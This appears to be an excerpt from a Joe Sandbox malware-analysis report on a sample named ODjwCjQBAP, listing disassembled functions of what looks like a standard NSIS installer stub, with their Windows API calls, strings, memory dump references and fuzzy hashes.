TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405526
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405562
OpenClipboard.USER32(00000000), ref: 00405572
EmptyClipboard.USER32 ref: 00405578
GlobalAlloc.KERNEL32(00000042,?), ref: 00405581
GlobalLock.KERNEL32(00000000), ref: 0040558B
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040559F
GlobalUnlock.KERNEL32(00000000), ref: 004055B8
SetClipboardData.USER32(00000001,00000000), ref: 004055C3
CloseClipboard.USER32 ref: 004055C9

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: c64a89a41c0802a74bba5a78dd280d07ec270940df5a5324a2dbd363d8ad6a15
Instruction ID: e0dc4773203ce2f112709eab9a11bfc184f4d069c8d5349c47d5b80479340f4b
Opcode Fuzzy Hash: c64a89a41c0802a74bba5a78dd280d07ec270940df5a5324a2dbd363d8ad6a15
Instruction Fuzzy Hash: 10A148B1900208BFDF119F60DD89AAE7BB9FB48355F00407AFA01B61A0C7B55E51DF69

Function 00403C09 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C45
ShowWindow.USER32(?), ref: 00403C62
DestroyWindow.USER32 ref: 00403C76
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403C92
GetDlgItem.USER32(?,?), ref: 00403CB3
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC7
IsWindowEnabled.USER32(00000000), ref: 00403CCE
GetDlgItem.USER32(?,00000001), ref: 00403D7C
GetDlgItem.USER32(?,00000002), ref: 00403D86
SetClassLongA.USER32(?,000000F2,?), ref: 00403DA0
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403DF1
GetDlgItem.USER32(?,00000003), ref: 00403E97
ShowWindow.USER32(00000000,?), ref: 00403EB8
EnableWindow.USER32(?,?), ref: 00403ECA
EnableWindow.USER32(?,?), ref: 00403EE5
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403EFB
EnableMenuItem.USER32(00000000), ref: 00403F02
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403F1A
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403F2D
lstrlenA.KERNEL32(0041FD30,?,0041FD30,00422F20), ref: 00403F56
SetWindowTextA.USER32(?,0041FD30), ref: 00403F65
ShowWindow.USER32(?,0000000A), ref: 00404099

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: f52cdbaf3123b7cbd9944adc9014d9948be0515c381cedadf67d37a6be0de08c
Instruction ID: 2eb83949b6bd8974722fa043abbaf2d62199bae10e2b8edc7fb886fd11b27e7e
Opcode Fuzzy Hash: f52cdbaf3123b7cbd9944adc9014d9948be0515c381cedadf67d37a6be0de08c
Instruction Fuzzy Hash: 3EC1F2B1604201BBDB20AF61EE84E2B3ABCFB84305F51053EF611B11E1C7799842EB5E

Function 00404229 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 209windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004042B0
GetDlgItem.USER32(?,000003E8), ref: 004042C4
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004042E2
GetSysColor.USER32(?), ref: 004042F3
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404302
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404311
lstrlenA.KERNEL32 ref: 00404314
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404323
SendMessageA.USER32(00000000,00000449,?,?), ref: 00404338
GetDlgItem.USER32(?,0000040A), ref: 0040439A
SendMessageA.USER32(00000000), ref: 0040439D
GetDlgItem.USER32(?,000003E8), ref: 004043C8
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404408
LoadCursorA.USER32(00000000,00007F02), ref: 00404417
SetCursor.USER32(00000000), ref: 00404420
ShellExecuteA.SHELL32(0000070B,open,004226C0,00000000,00000000,00000001), ref: 00404433
LoadCursorA.USER32(00000000,00007F00), ref: 00404440
SetCursor.USER32(00000000), ref: 00404443
SendMessageA.USER32(00000111,00000001,00000000), ref: 0040446F
SendMessageA.USER32(00000010,00000000,00000000), ref: 00404483

Strings

open, xrefs: 0040442B
N, xrefs: 004043B6

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: N$open
API String ID: 3615053054-904208323
Opcode ID: fcb538ac3dcd5d073d4dc883c570750d07bdf7e1e6628805ae3c2de539a5b723
Instruction ID: 42d062241169b884b3317a3a104e1cf407c17e646fd8fbbbf9edf650e8e07a34
Opcode Fuzzy Hash: fcb538ac3dcd5d073d4dc883c570750d07bdf7e1e6628805ae3c2de539a5b723
Instruction Fuzzy Hash: 5771B1B1A40205BFEB10DF61DC45F6A3B69FB84314F10807AFB05BA2D1C7B8A951DB99

Function 00403877 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00406290: GetModuleHandleA.KERNEL32(?,?,?,00403329,00000009), ref: 004062A2
Part of subcall function 00406290: GetProcAddress.KERNEL32(00000000,?), ref: 004062BD

lstrcatA.KERNEL32(0042A000,0041FD30,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD30,00000000,00000002,75923410,0042A400,00429000,00000000), ref: 004038F2
lstrlenA.KERNEL32(004226C0,?,?,?,004226C0,00000000,00429400,0042A000,0041FD30,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD30,00000000,00000002,75923410), ref: 00403967
lstrcmpiA.KERNEL32(?,.exe), ref: 0040397A
GetFileAttributesA.KERNEL32(004226C0), ref: 00403985
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00429400), ref: 004039CE

Part of subcall function 00405E55: wsprintfA.USER32 ref: 00405E62

RegisterClassA.USER32(00422EC0), ref: 00403A0B
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A23
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A58
ShowWindow.USER32(00000005,00000000), ref: 00403A8E
GetClassInfoA.USER32(00000000,RichEdit20A,00422EC0), ref: 00403ABA
GetClassInfoA.USER32(00000000,RichEdit,00422EC0), ref: 00403AC7
RegisterClassA.USER32(00422EC0), ref: 00403AD0
DialogBoxParamA.USER32(?,00000000,00403C09,00000000), ref: 00403AEF

Strings

.DEFAULT\Control Panel\International, xrefs: 004038DD
RichEdit20A, xrefs: 00403AB2, 00403AB8
Control Panel\Desktop\ResourceLocale, xrefs: 004038AB
RichEd32, xrefs: 00403AA2
_Nb, xrefs: 004039EA, 00403A52
RichEdit, xrefs: 00403AC1
RichEd20, xrefs: 00403A94
.exe, xrefs: 00403974

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-2904746566
Opcode ID: acb9e1483f64e376554eea66f981f1d844e256060aa5afb508f73614915c59b6
Instruction ID: 29345e8072be8e75dc90901d6125d60d13300850aec60374d900494af90ecb47
Opcode Fuzzy Hash: acb9e1483f64e376554eea66f981f1d844e256060aa5afb508f73614915c59b6
Instruction Fuzzy Hash: 8161A4B06442407ED620AF65AD45F373A6CEB8474AF40447FF945B22E2C6BCAD029A3D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00422F20,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
Instruction ID: f6076547c65416f673289c9e9aa760257b54fe90aa12de16c0a46004740ece36
Opcode Fuzzy Hash: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
Instruction Fuzzy Hash: C2419B71804249AFCF058FA4CD459AFBBB9FF45310F00812AF961AA1A0C738EA50DFA5

Function 00405C40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(00421AC0,NUL,?,00000000,?,00000000,00405DD3,?,?), ref: 00405C4F
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405DD3,?,?), ref: 00405C73
GetShortPathNameA.KERNEL32(?,00421AC0,00000400), ref: 00405C7C

Part of subcall function 00405ACF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ADF
Part of subcall function 00405ACF: lstrlenA.KERNEL32(00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B11

GetShortPathNameA.KERNEL32(00421EC0,00421EC0,00000400), ref: 00405C99
wsprintfA.USER32 ref: 00405CB7
GetFileSize.KERNEL32(00000000,00000000,00421EC0,C0000000,00000004,00421EC0,?,?,?,?,?), ref: 00405CF2
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405D01
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D39
SetFilePointer.KERNEL32(004093C8,00000000,00000000,00000000,00000000,004216C0,00000000,-0000000A,004093C8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D8F
GlobalFree.KERNEL32(00000000), ref: 00405DA0
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405DA7

Part of subcall function 00405B6A: GetFileAttributesA.KERNEL32(00000003,00402D8D,0042AC00,80000000,00000003), ref: 00405B6E
Part of subcall function 00405B6A: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B90

Strings

%s=%s, xrefs: 00405CAD
NUL, xrefs: 00405C49
[Rename], xrefs: 00405D21, 00405D33

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 222337774-4148678300
Opcode ID: 2e3f1d5478f9f0c6b3014663fcb7d6cbfaa562a2a519d3499902ae05c7337469
Instruction ID: 58b8e60db813422e8a8f05baf12fe1cb7cc397f7baf35d3febd204dd1aeecf15
Opcode Fuzzy Hash: 2e3f1d5478f9f0c6b3014663fcb7d6cbfaa562a2a519d3499902ae05c7337469
Instruction Fuzzy Hash: D031C271A04B596BD2202B219D49F6B3A6CDF85754F18003BF901F62D2E67CA8018EAD

Function 0040451A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404569
SetWindowTextA.USER32(00000000,?), ref: 00404593
SHBrowseForFolderA.SHELL32(?,0041F108,?), ref: 00404644
CoTaskMemFree.OLE32(00000000), ref: 0040464F
lstrcmpiA.KERNEL32(004226C0,0041FD30), ref: 00404681
lstrcatA.KERNEL32(?,004226C0), ref: 0040468D
SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040469F

Part of subcall function 004056D1: GetDlgItemTextA.USER32(?,?,00000400,004046D6), ref: 004056E4

Part of subcall function 00406162: CharNextA.USER32(?,*?|<>/":,00000000,00429000,75923410,0042A400,00000000,0040329A,0042A400,0042A400,004034AF), ref: 004061BA
Part of subcall function 00406162: CharNextA.USER32(?,?,?,00000000), ref: 004061C7
Part of subcall function 00406162: CharNextA.USER32(?,00429000,75923410,0042A400,00000000,0040329A,0042A400,0042A400,004034AF), ref: 004061CC
Part of subcall function 00406162: CharPrevA.USER32(?,?,75923410,0042A400,00000000,0040329A,0042A400,0042A400,004034AF), ref: 004061DC

GetDiskFreeSpaceA.KERNEL32(0041ED00,?,?,0000040F,?,0041ED00,0041ED00,?,00000001,0041ED00,?,?,000003FB,?), ref: 0040475D
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404778

Part of subcall function 004048D1: lstrlenA.KERNEL32(0041FD30,0041FD30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047EC,000000DF,00000000,00000400,?), ref: 0040496F
Part of subcall function 004048D1: wsprintfA.USER32 ref: 00404977
Part of subcall function 004048D1: SetDlgItemTextA.USER32(?,0041FD30), ref: 0040498A

Strings

A, xrefs: 0040463D

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A
API String ID: 2624150263-3554254475
Opcode ID: 22e506ab911b47b1d52a2713ecca6c1ad83ea481866ddf22d065b1d45e7491c6
Instruction ID: 7ea719a0b93bcaca37b111b678a2b5d6f3f78fc0ed79788128ac85d93e839f9f
Opcode Fuzzy Hash: 22e506ab911b47b1d52a2713ecca6c1ad83ea481866ddf22d065b1d45e7491c6
Instruction Fuzzy Hash: D5A18EB1900209ABDB11AFA5CC45AAFB7B8EF85314F10843BF711B62D1D77C8A418F69

Function 00402D4A Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402D5E
GetModuleFileNameA.KERNEL32(00000000,0042AC00,00000400), ref: 00402D7A

Part of subcall function 00405B6A: GetFileAttributesA.KERNEL32(00000003,00402D8D,0042AC00,80000000,00000003), ref: 00405B6E
Part of subcall function 00405B6A: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B90

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,00429C00,00429C00,0042AC00,0042AC00,80000000,00000003), ref: 00402DC3
GlobalAlloc.KERNEL32(00000040,00409130), ref: 00402F0A

Strings

soft, xrefs: 00402E3A
Null, xrefs: 00402E43
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402FA1
Error launching installer, xrefs: 00402D9A
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402F53
Inst, xrefs: 00402E31

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-3016655952
Opcode ID: 6949a2dc81abe6ae8ca3848ee1a274e905e25326872c2b53de3725809208b6fc
Instruction ID: 1e54d23c6bd4663b885b54a46d63d50a2b02afe17d1d0705d7bda66adc4b1b0c
Opcode Fuzzy Hash: 6949a2dc81abe6ae8ca3848ee1a274e905e25326872c2b53de3725809208b6fc
Instruction Fuzzy Hash: 6661E5B1A40215ABDF20AF64DE89A9E76B8EB04355F11413FF904B72C1C7BC9D418B9C

Function 00405F19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 199stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,0041F510,00000000,00405148,0041F510,00000000), ref: 00405FCA
GetSystemDirectoryA.KERNEL32(004226C0,00000400), ref: 00406045
GetWindowsDirectoryA.KERNEL32(004226C0,00000400), ref: 00406058
SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00406094
SHGetPathFromIDListA.SHELL32(00000000,004226C0), ref: 004060A2
CoTaskMemFree.OLE32(00000000), ref: 004060AD
lstrcatA.KERNEL32(004226C0,\Microsoft\Internet Explorer\Quick Launch), ref: 004060CF
lstrlenA.KERNEL32(004226C0,?,0041F510,00000000,00405148,0041F510,00000000), ref: 00406121

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406014
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004060C9

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-730719616
Opcode ID: ecdefe2751fc2be78af5e26724b3c6b53ae81c07b092af95d9830a7abdf9c2ab
Instruction ID: 17f1afa1df4653d6aa239bb2462815deac18f6a32033811d9d8cd7bf3bfa2e02
Opcode Fuzzy Hash: ecdefe2751fc2be78af5e26724b3c6b53ae81c07b092af95d9830a7abdf9c2ab
Instruction Fuzzy Hash: 68613671A00111AEDF209F24CC84BBF3BA8EB45314F12813BE942BA2D1D77D4962DB5E

Function 00404143 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00404160
GetSysColor.USER32(00000000), ref: 0040417C
SetTextColor.GDI32(?,00000000), ref: 00404188
SetBkMode.GDI32(?,?), ref: 00404194
GetSysColor.USER32(?), ref: 004041A7
SetBkColor.GDI32(?,?), ref: 004041B7
DeleteObject.GDI32(?), ref: 004041D1
CreateBrushIndirect.GDI32(?), ref: 004041DB

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction ID: 7122de99037e03f190bb62226e04253736cb74e6c142f140589d3e5d77d1f23d
Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction Fuzzy Hash: DB21A4B5804704ABCB219F78DD08B5BBBF8AF41714F048629E995E62E0C734E944CB55

Function 00405110 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
lstrlenA.KERNEL32(00402D22,0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
lstrcatA.KERNEL32(0041F510,00402D22,00402D22,0041F510,00000000,00000000,00000000), ref: 0040516C
SetWindowTextA.USER32(0041F510,0041F510), ref: 0040517E
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 5079ce61eb60a58f18aa72498b661a7186dcc34ecfe9b72952c752fd8c1df286
Instruction ID: 38fa31381a166635c2069e030e34d3db0945d62c2eda65f80c6bd2e149c96a35
Opcode Fuzzy Hash: 5079ce61eb60a58f18aa72498b661a7186dcc34ecfe9b72952c752fd8c1df286
Instruction Fuzzy Hash: FD215C71E00518BBDF119FA5CD80ADFBFB9EB04354F14807AF904AA291C7799A41CFA8

Function 00402CAB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000), ref: 00402CC3
GetTickCount.KERNEL32 ref: 00402CE1
wsprintfA.USER32 ref: 00402D0F

Part of subcall function 00405110: lstrlenA.KERNEL32(0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
Part of subcall function 00405110: lstrlenA.KERNEL32(00402D22,0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
Part of subcall function 00405110: lstrcatA.KERNEL32(0041F510,00402D22,00402D22,0041F510,00000000,00000000,00000000), ref: 0040516C
Part of subcall function 00405110: SetWindowTextA.USER32(0041F510,0041F510), ref: 0040517E
Part of subcall function 00405110: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
Part of subcall function 00405110: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
Part of subcall function 00405110: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC

CreateDialogParamA.USER32(0000006F,00000000,00402C13,00000000), ref: 00402D33
ShowWindow.USER32(00000000,00000005), ref: 00402D41

Part of subcall function 00402C8F: MulDiv.KERNEL32(?,00000064,?), ref: 00402CA4

Strings

... %d%%, xrefs: 00402D09

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 1e33dda50caea38695290f70d86be4c9e72cbf0e3d215f61cbcfcdcf3d334b50
Instruction ID: 547fa0e596d0efa3134ade0ba199646732fee1a7f54f1ab5f8be41358a9578df
Opcode Fuzzy Hash: 1e33dda50caea38695290f70d86be4c9e72cbf0e3d215f61cbcfcdcf3d334b50
Instruction Fuzzy Hash: DC019BB0906614E7EB21BB64EF0DEDE766CEB04701B444037F405B11E5C7B89941D79E

